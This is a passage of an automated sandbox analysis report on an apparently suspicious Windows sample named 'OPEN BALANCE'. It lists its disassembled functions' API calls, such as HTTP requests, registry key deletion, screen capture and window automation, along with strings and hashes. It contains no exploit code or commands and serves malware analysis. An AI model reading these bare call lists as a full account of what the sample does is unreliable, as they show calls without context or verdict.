SendMessageW.USER32(00000000,00000421,?,00000000), ref: 008D6F4D

Part of subcall function 00859944: GetWindowLongW.USER32(?,000000EB), ref: 00859952

Strings

tooltips_class32, xrefs: 008D6E58, 008D6EDD
0, xrefs: 008D6D98

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 8265535d3b9672c582701ac168663124e65f10badd8df3c659959afa41375fdc
Instruction ID: 916976f6c9a5a60689a10632f674f9a67b37ef1e75f1f89a3e99a031f5957edc
Opcode Fuzzy Hash: 8265535d3b9672c582701ac168663124e65f10badd8df3c659959afa41375fdc
Instruction Fuzzy Hash: F0716874104249AFDB21CF18E844EAABBF9FB89304F14461EF999C7361EB70E915DB12

Function 008BC476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008BC4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 008BC4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 008BC4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 008BC4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 008BC533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 008BC549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008BC554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 008BC584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 008BC5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 008BC5F0
InternetCloseHandle.WININET(00000000), ref: 008BC5FB

Strings

, xrefs: 008BC575

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: 55bad5ad8b56ebe87b46a9c810666186d65b5f708e4a63525f9fd020fb9f8f0b
Instruction ID: d93694be262c9e8ed44af4c9063586b1403c0d27d66dee75f139c03a2fda30b2
Opcode Fuzzy Hash: 55bad5ad8b56ebe87b46a9c810666186d65b5f708e4a63525f9fd020fb9f8f0b
Instruction Fuzzy Hash: 6C5149B1501609BFDB219F65C988AEB7BBCFF08754F00451AF946D6210DB74EA44DBA0

Function 008B14BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 008B1502
VariantCopy.OLEAUT32(?,?), ref: 008B150B
VariantClear.OLEAUT32(?), ref: 008B1517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 008B15FB
VarR8FromDec.OLEAUT32(?,?), ref: 008B1657
VariantInit.OLEAUT32(?), ref: 008B1708
SysFreeString.OLEAUT32(?), ref: 008B178C
VariantClear.OLEAUT32(?), ref: 008B17D8
VariantClear.OLEAUT32(?), ref: 008B17E7
VariantInit.OLEAUT32(00000000), ref: 008B1823

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 008B1625
Default, xrefs: 008B16AF

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: baa78a3b8877e9ab0adb6775361d9748f013a8cb140c3b02ab3c71a064b3d9fe
Instruction ID: 1131d690202e0c4ebfb2f557b6f8bce279ed4e14da278f24511d99273edd1bd1
Opcode Fuzzy Hash: baa78a3b8877e9ab0adb6775361d9748f013a8cb140c3b02ab3c71a064b3d9fe
Instruction Fuzzy Hash: 9CD1E032A00109DBDF249F69E8A9BB9B7B5FF45704F908156E846EF281DB30DC44DB92

Function 008CB60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00849CB3: _wcslen.LIBCMT ref: 00849CBD

Part of subcall function 008CC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008CB6AE,?,?), ref: 008CC9B5
Part of subcall function 008CC998: _wcslen.LIBCMT ref: 008CC9F1
Part of subcall function 008CC998: _wcslen.LIBCMT ref: 008CCA68
Part of subcall function 008CC998: _wcslen.LIBCMT ref: 008CCA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008CB6F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008CB772
RegDeleteValueW.ADVAPI32(?,?), ref: 008CB80A
RegCloseKey.ADVAPI32(?), ref: 008CB87E
RegCloseKey.ADVAPI32(?), ref: 008CB89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 008CB8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 008CB904
RegDeleteKeyW.ADVAPI32(?,?), ref: 008CB922
FreeLibrary.KERNEL32(00000000), ref: 008CB983
RegCloseKey.ADVAPI32(00000000), ref: 008CB994

Strings

RegDeleteKeyExW, xrefs: 008CB8FE
advapi32.dll, xrefs: 008CB8ED

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: 88ba20158a5d5649143f7523500e4fefef6bfc1413184e70bbce83a1dff2f379
Instruction ID: 54a38a21671937f6b5f3cc9f910889880195c0e63b2c8a5aaac37cff5f07be12
Opcode Fuzzy Hash: 88ba20158a5d5649143f7523500e4fefef6bfc1413184e70bbce83a1dff2f379
Instruction Fuzzy Hash: 51C17930209601AFD714DF28C495F2ABBF5FF84318F14855CE49A8B2A2DB75EC49CB92

Function 008C255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 008C25D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 008C25E8
CreateCompatibleDC.GDI32(?), ref: 008C25F4
SelectObject.GDI32(00000000,?), ref: 008C2601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 008C266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 008C26AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 008C26D0
SelectObject.GDI32(?,?), ref: 008C26D8
DeleteObject.GDI32(?), ref: 008C26E1
DeleteDC.GDI32(?), ref: 008C26E8
ReleaseDC.USER32(00000000,?), ref: 008C26F3

Strings

(, xrefs: 008C268D

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 90f53c10b57dba09ceb969ea13340fef7477bb9f0ddf0b4058097536748fd3db
Instruction ID: 5d663a600488dba8512b5a7ccb0013eea10f8de3dfbf15fa8c882a1e63acbb5d
Opcode Fuzzy Hash: 90f53c10b57dba09ceb969ea13340fef7477bb9f0ddf0b4058097536748fd3db
Instruction Fuzzy Hash: 1E61C275D0121AEFCF04CFA8D885EAEBBB5FF48310F24852AE955A7250D770A951CF60

Function 008D856F Relevance: 21.1, APIs: 14, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 008D8592
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 008D85A2
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 008D85AD
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 008D85BA
GlobalFix.KERNEL32(00000000), ref: 008D85C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 008D85D7
GlobalUnWire.KERNEL32(00000000), ref: 008D85E0
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 008D85E7
OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,008DFC38,?), ref: 008D8611
GlobalFree.KERNEL32(00000000), ref: 008D8621
GetObjectW.GDI32(?,00000018,?), ref: 008D8641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 008D8671
DeleteObject.GDI32(?), ref: 008D8699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 008D86AF

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Global$File$CloseHandleObject$AllocCopyCreateDeleteFreeImageLoadMessagePictureReadSendSizeWire
String ID:
API String ID: 237262595-0
Opcode ID: eea1bd596fb32879178ee6efef16d4f18775a33d89772914885f92851a45591c
Instruction ID: 29e550f1e56988b2e7f8802db77ae66fdb9ab8943d92a98aac31b7c3f28b7969
Opcode Fuzzy Hash: eea1bd596fb32879178ee6efef16d4f18775a33d89772914885f92851a45591c
Instruction Fuzzy Hash: 69412975601209EFDB119FA5DC48EAE7BBCFF99711F10425AF90AE7260DB309901DB20

Function 0087DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0087DAA1

Part of subcall function 0087D63C: _free.LIBCMT ref: 0087D659
Part of subcall function 0087D63C: _free.LIBCMT ref: 0087D66B
Part of subcall function 0087D63C: _free.LIBCMT ref: 0087D67D
Part of subcall function 0087D63C: _free.LIBCMT ref: 0087D68F
Part of subcall function 0087D63C: _free.LIBCMT ref: 0087D6A1
Part of subcall function 0087D63C: _free.LIBCMT ref: 0087D6B3
Part of subcall function 0087D63C: _free.LIBCMT ref: 0087D6C5
Part of subcall function 0087D63C: _free.LIBCMT ref: 0087D6D7
Part of subcall function 0087D63C: _free.LIBCMT ref: 0087D6E9
Part of subcall function 0087D63C: _free.LIBCMT ref: 0087D6FB
Part of subcall function 0087D63C: _free.LIBCMT ref: 0087D70D
Part of subcall function 0087D63C: _free.LIBCMT ref: 0087D71F
Part of subcall function 0087D63C: _free.LIBCMT ref: 0087D731

_free.LIBCMT ref: 0087DA96

Part of subcall function 008729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0087D7D1,00000000,00000000,00000000,00000000,?,0087D7F8,00000000,00000007,00000000,?,0087DBF5,00000000), ref: 008729DE
Part of subcall function 008729C8: GetLastError.KERNEL32(00000000,?,0087D7D1,00000000,00000000,00000000,00000000,?,0087D7F8,00000000,00000007,00000000,?,0087DBF5,00000000,00000000), ref: 008729F0

_free.LIBCMT ref: 0087DAB8
_free.LIBCMT ref: 0087DACD
_free.LIBCMT ref: 0087DAD8
_free.LIBCMT ref: 0087DAFA
_free.LIBCMT ref: 0087DB0D
_free.LIBCMT ref: 0087DB1B
_free.LIBCMT ref: 0087DB26
_free.LIBCMT ref: 0087DB5E
_free.LIBCMT ref: 0087DB65
_free.LIBCMT ref: 0087DB82
_free.LIBCMT ref: 0087DB9A

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 98a6161c5445293e89a8e2cef950712664300a415c2a0bf3fc90ddac8b02adb0
Instruction ID: 2b41d844a7ee6b90ef762f912f2a6f6013db3eaaab890f664e01e7c68b2bbce2
Opcode Fuzzy Hash: 98a6161c5445293e89a8e2cef950712664300a415c2a0bf3fc90ddac8b02adb0
Instruction Fuzzy Hash: 15314A326043059FEB21AA39E845F5ABBF9FF00320F15C419E54DD7199DB31EC808721

Function 008A365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 008A369C
_wcslen.LIBCMT ref: 008A36A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 008A3797
GetClassNameW.USER32(?,?,00000400), ref: 008A380C
GetDlgCtrlID.USER32(?), ref: 008A385D
GetWindowRect.USER32(?,?), ref: 008A3882
GetParent.USER32(?), ref: 008A38A0
ScreenToClient.USER32(00000000), ref: 008A38A7
GetClassNameW.USER32(?,?,00000100), ref: 008A3921
GetWindowTextW.USER32(?,?,00000400), ref: 008A395D

Strings

%s%u, xrefs: 008A3734

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: bc0fc62200f969535f87ddb203d0f990aa73167d6c8165a35ee4fd07b7c2b276
Instruction ID: 828641b1f1895c2367303c0273347225cff4d67456d78e267ed77b6cc0a3d719
Opcode Fuzzy Hash: bc0fc62200f969535f87ddb203d0f990aa73167d6c8165a35ee4fd07b7c2b276
Instruction Fuzzy Hash: FC91C371204706AFE719DF24C885FABF7A8FF46350F008629F999C2590EB34EA45CB91

Function 008A4954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 008A4994
GetWindowTextW.USER32(?,?,00000400), ref: 008A49DA
_wcslen.LIBCMT ref: 008A49EB
CharUpperBuffW.USER32(?,00000000), ref: 008A49F7
_wcsstr.LIBVCRUNTIME ref: 008A4A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 008A4A64
GetWindowTextW.USER32(?,?,00000400), ref: 008A4A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 008A4AE6
GetClassNameW.USER32(?,?,00000400), ref: 008A4B20
GetWindowRect.USER32(?,?), ref: 008A4B8B

Strings

ThumbnailClass, xrefs: 008A4A6F, 008A4AF1

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: 26cf32d379e0c50c09de100a2f833fc5c46bbbda428ef0ded41cbfed232e5e78
Instruction ID: ccf57c1e1a99c59b79170454c56474e6c2e39287f620faa52e393777698af651
Opcode Fuzzy Hash: 26cf32d379e0c50c09de100a2f833fc5c46bbbda428ef0ded41cbfed232e5e78
Instruction Fuzzy Hash: 0991E0710042059FEF04CF54D881BAA77E8FF85324F04946AFD85DA496EB70ED46CBA2

Function 008CCC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 008CCC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 008CCC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 008CCD48

Part of subcall function 008CCC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 008CCCAA
Part of subcall function 008CCC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 008CCCBD
Part of subcall function 008CCC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 008CCCCF
Part of subcall function 008CCC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 008CCD05
Part of subcall function 008CCC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 008CCD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 008CCCF3

Strings

RegDeleteKeyExW, xrefs: 008CCCC9
advapi32.dll, xrefs: 008CCCB8

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 8414c090c6aeb30d4dc546b8effbe2ea88540b7bfddd95f6c7c4fe2819c8ef8e
Instruction ID: ef70d1fb8cf6b13b4f6ae15cc77223bdd4f1b67571bd4e68c822935c08d37681
Opcode Fuzzy Hash: 8414c090c6aeb30d4dc546b8effbe2ea88540b7bfddd95f6c7c4fe2819c8ef8e
Instruction Fuzzy Hash: E931617190212ABBDB208B55DC88EFFBB7CFF55754F004269F90AE2140DB349E45DAA0

Function 008AE6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 008AE6B4

Part of subcall function 0085E551: timeGetTime.WINMM(?,?,008AE6D4), ref: 0085E555

Sleep.KERNEL32(0000000A), ref: 008AE6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 008AE705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 008AE727
SetActiveWindow.USER32 ref: 008AE746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 008AE754
SendMessageW.USER32(00000010,00000000,00000000), ref: 008AE773
Sleep.KERNEL32(000000FA), ref: 008AE77E
IsWindow.USER32 ref: 008AE78A
EndDialog.USER32(00000000), ref: 008AE79B

Strings

BUTTON, xrefs: 008AE719

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 7a8ec4e9642fcd7fff2e3f1cf92d747dda1d2666756a797169eb2a040d876c2c
Instruction ID: 3cacc0b14a408c1908dca9911d175c725150d774e19f1eb4d0fd64716b0e21a1
Opcode Fuzzy Hash: 7a8ec4e9642fcd7fff2e3f1cf92d747dda1d2666756a797169eb2a040d876c2c
Instruction Fuzzy Hash: 88219370314206BFFB106F64EC89B693B69F7A6389F104926F512C25E1DB71AC10EA25

Function 008AE9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00849CB3: _wcslen.LIBCMT ref: 00849CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 008AEA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 008AEA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 008AEA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 008AEA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 008AEAA7

Strings

status PlayMe mode, xrefs: 008AEA58
close PlayMe, xrefs: 008AEA6E, 008AEA9B
play PlayMe wait, xrefs: 008AEA91
play PlayMe, xrefs: 008AEAA2
open , xrefs: 008AEA0C
alias PlayMe, xrefs: 008AEA36

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: 040054bbe6f85acc754eba39ad441521591d2ac656d26d19371a5101107b6d22
